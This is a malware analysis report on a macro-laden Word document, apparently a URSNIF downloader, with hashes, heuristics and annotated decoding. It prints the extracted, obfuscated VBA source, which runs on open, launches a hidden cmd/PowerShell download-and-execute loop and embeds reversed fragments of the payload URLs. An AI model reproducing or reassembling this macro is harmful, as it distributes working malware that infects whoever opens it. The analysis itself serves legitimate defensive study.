Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1798d0ca114dc162…

MALICIOUS

Office (OLE)

Size: 68.6 KB · Created: 2018-09-10 18:14:00 · Authoring application: Microsoft Office Word · First seen: 2019-08-04
MD5: 5b928f65eebaaf6c84c672d82167243c SHA-1: 2f9a050567f655bb560fea5973be4ed7653307fc SHA-256: 1798d0ca114dc162c57600c45ecc01b68a412fa9bfbce0ad58a173187470da4e
Risk score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that calls Shell() to run a command line assembled at runtime from concatenated string fragments. The fragments are doubly obfuscated: Chr() arithmetic hides the literal characters, and the text after `cmd /V/C"set ^un=` is written backwards with cmd caret escapes (^) inserted. Decoding the fragments that are visible in the extracted macro yields a PowerShell loop of the form `foreach($ajm in $iaQ){try{$JAV.DownloadFile($ajm, $QNh);Invoke-Item $QNh;break;}catch{}}` with `$QNh=$env:public+'\'+'250'+'.exe'`, i.e. it walks an '@'-separated URL list, saves the first successful download as %PUBLIC%\250.exe and executes it — a download-and-execute stage. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' is consistent with this, and suggests the second stage is the URSNIF banking trojan (not confirmed from the document alone). The URL list and the reversal/launch part of the command are only partially present in the truncated extract, so any URL IOCs recovered from it should be treated as incomplete.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard OOXML DrawingML namespace URI found in ordinary Office files; it is expected boilerplate, not a download location or an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6085 bytes
SHA-256: 1405aa48867e9ab02e74dc378d4e75c1c43bc8ac09edf665f04e520babf39f55
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DScSFWmSd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word fires Document_Open when the document is opened
' and macros are enabled, so no further user interaction is needed
' (report heuristics: OLE_VBA_DOCOPEN, ATT&CK T1204.002 / T1059.005).
Private Sub Document_open()
' "On Error Resume Next" split over four physical lines with "_" line
' continuations. Every runtime error in this procedure is silently swallowed.
On _
Error _
Resume _
Next
   ' "Second" is not defined anywhere in the visible listing. If it resolves
   ' to the VBA built-in Second(date), calling it with a junk string argument
   ' raises a type mismatch that the error handler above discards, so these
   ' lines appear to be no-op padding meant to bloat and obfuscate the macro
   ' (NOTE(review): assumption — confirm by checking the rest of the module).
   Second "jB" + "V" + "P" + "pY"
   Second "smDijYr" + "498506569" + "199925522" + "IlIv"
   Second "8096" + "2801" + "l" + "XzZ"
   Second "O" + "YtiFFjwRUtwX"
   Second "t" + "wmPC" + "ArfhE" + "5913"
   Second "108297814" + "tlpZmqaSbIGD" + "uQbZWwKz" + "288079395"
' The actual launcher (OLE_VBA_SHELL). The command line is the concatenation
' of three helper results: JnIwAcXkDF (cmd /V header + reversed PowerShell
' tail, defined below) + ltzXTSIt (reversed URL fragments, defined below,
' cut off in this extract) + shBsvo (not visible in this extract).
' CStr(vbHide) passes "0" as the window style, so the spawned cmd.exe runs
' with no visible window.
Shell JnIwAcXkDF + ltzXTSIt + shBsvo, CStr(vbHide)
   ' More of the same padding after the Shell call.
   Second "ip" + "R" + "qJdkao" + "LdYCwXAXjYT"
   Second "BrYuOihP" + "1872" + "286084769" + "W"
End Sub



Attribute VB_Name = "djYMwnQZik"
' Builds the first segment of the command line that Document_open passes to
' Shell. Reviewer decoding of the Chr() arithmetic used throughout:
'   Chr(13 + 16 + 18 + 11 + 41) = Chr(99) = "c"
'   Chr(9 + 10 + 12 + 7 + 29)   = Chr(67) = "C"
'   Chr(4 + 5 + 5 + 3 + 17)     = Chr(34) = the double-quote character
' With those substituted, the six fragments joined at the end read as
'   cmd /V/C"set ^un=<filler><obfuscated text>
' The text after "set ^un=" is cmd-level obfuscation: "^" is the cmd escape
' character (dropped when cmd parses the line), and what remains is
' PowerShell written BACKWARDS. The per-fragment comments below give each
' piece with carets removed and the characters reversed. The loop that turns
' the variable back around and runs it (typically a "for /L" over !un:~%X,1!)
' is not in the visible part of the listing — presumably in shBsvo.
' Returns: a String (Variant) — the concatenated fragments, unchanged.
Function JnIwAcXkDF()

' Same split "On Error Resume Next" as in Document_open: errors are swallowed.
On _
Error _
Resume _
Next
' "Second ..." lines: padding, see the note in Document_open.
Second "iRiSRcNmEzkC" + "DmMjJO" + "3155" + "HGwZJGVjlYRlh"
   Second "3894" + "73969938" + "5745" + "UEZcVNlOS"
' Decodes to: cmd /V/C"set ^un=   followed by space/caret filler.
' /V enables delayed environment-variable expansion, which the reversal
' trick relies on; /C runs the quoted string and exits.
jfupX = Format(Chr(13 + 16 + 18 + 11 + 41)) + "m" + "d " + "/V" + "/" + Format(Chr(9 + 10 + 12 + 7 + 29)) + Format(Chr(4 + 5 + 5 + 3 + 17)) + "se" + "t" + " ^un=" + " " + "  ^ ^ ^" + " " + "^ " + "  ^ ^  " + "^  "
Second "3135" + "1444"
' Carets stripped and reversed: -Item $QNh;break;}catch{}}
' (the tail of the PowerShell: Invoke-Item on the dropped file, then break.)
XszRsqnN = "^" + "   ^}" + "}{^h" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^t" + "a" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "};^k^" + "aer^b^;" + "hNQ$ m^" + "e" + "^" + "tI-"
Second "YVkuvh" + "5609"
   Second "F" + "8511" + "7522" + "jB"
' Carets stripped and reversed: ownloadFile($ajm, $QNh);Invoke
' (the leading "D" of DownloadFile is the first character of tcYUi.)
Fnofi = "ek^ov" + "nI;" + ")hNQ" + "^$ " + ",m^j^a" + "^$(" + "e^li^F" + "d^a^o" + "^l" + "n^wo^"
Second "wiaVNODsP" + "120023095"
   Second "ni" + "SEJLGhB" + "fzUHikhFk" + "6915"
   Second "NLQ" + "GAvwjWMj"
' Carets stripped and reversed: ';foreach($ajm in $iaQ){try{$JAV.D
' ($JAV is used like a WebClient; its construction is not visible here.)
tcYUi = "D" + ".VAJ^$" + "^{^yr" + "t^" + "{)" + "^Qa^i" + "^$ n^i^" + " m^ja" + "^$(^h" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "a" + "^er^" + "o^f;'^"
Second "zrz" + "16939862"
   Second "UMdU" + "4337"
' Carets stripped and reversed: = '250';$QNh=$env:public+'\'+$zBz+'.exe
' i.e. the download target path is %PUBLIC%\250.exe.
KdLDSJmQQBi = "e" + "x^e^.'+" + "^z^" + "B^z$+^" + "'^\'^+" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^il^b^" + "u^p" + "^:vne^" + "$^=" + "^hN^" + "Q$^;^'" + "0^52" + "^' ^=^"
Second "G" + "XdGUwPGYDE"
   Second "1888" + "CK" + "k" + "JTSZ"
   Second "4176" + "174622993"
   Second "ar" + "RJ" + "jMS" + "D"
' Carets stripped and reversed: com/Y1J1P6E'.Split('@');$zBz
' i.e. the end of an '@'-separated URL list that becomes $iaQ; the rest of
' the URL text is produced by ltzXTSIt.
qXwkdMuzMCI = " ^z^" + "B^z^$;)" + "^" + "'^@'(^" + "ti^lpS." + "'E6P^" + "1^" + "J^1" + "Y" + "/^" + "mo" + Format(Chr(13 + 16 + 18 + 11 + 41))
' Return value: the fragments in assembly order (reverse of execution order
' for the PowerShell part, since the whole "un" value is reversed later).
JnIwAcXkDF = jfupX + XszRsqnN + Fnofi + tcYUi + KdLDSJmQQBi + qXwkdMuzMCI
   Second "390739740" + "WAQ" + "HiH" + "4145"
   Second "iR" + "U" + "zN" + "2541"
   Second "386758781" + "435859074"
End Function
Function ltzXTSIt()

On _
Error _
Resume _
Next
Second "5891" + "380088353" + "256706086" + "534720716"
owBYP = ".x" + "r" + "sha/" + "/" + ":p^" + "t" + "t^h" + "@" + "6VTdy" + "y^x/r" + "b.^m"
Second "469443791" + "5820" + "447736913" + "520975922"
   Second "9380" + "4185"
   Second "ITBVtRVZotphpQ" + "wzANukuJUt" + "o" + "125622862"
   Second "XXFSAB" + "7054" + "c" + "ucJi"
azmBVtWXC = "^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^." + "t^lu" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "omso" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "//" + ":p^t" + "th^" + "@^1" + Format(Chr(9 + 10 + 12 + 7 + 29)) + "J^" + "gz^M3^" + "2l" + "f/"
Second "4810" + "186905810"
   Second "iv" + "hTSaMBu"
   Second "3757" + "8772936" + "SO" + "IoCUhON"
   Second "4055" + "bodZdK" + "80243354" + "Rb"
   Second "aXopVCY" + "m" + "3033" + "362418012"
uvYsRs = "z^t" + "^.^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "." + "enil^" + "tn" + "^orf" + "//"
Second "5724" + "RCjXlIivw" + "NSVBPnBImnCD" + "169773230"
nSGAtvhL = ":^ptth" + "^@" + "v^q" + "j4l" + "N" + "i^W/tn" + "e^tn^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "-pw/" + "m^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^." + "a^t"
Second "bcUwowTz" + "tNsAdKbUN" + "zOuBtInHYoQCkd" + "iPHimbhB"
   Second "322021529" + "11413413" + "APDSdr" + "VBCPuoP"
   Second "r" + "hbXAAIQk" + "kNd" + "zrD"
zdwoHzBZv = "^in" + "^a^" + "w^g" + "n^" + "atn^e" + "^tle^ki" + "tr" + "^a//:^p"
Second "bpBouLjq" + "PIu" + "6504" + "1074"
   Second "mb" + "342785519" + "SMli"
... (truncated)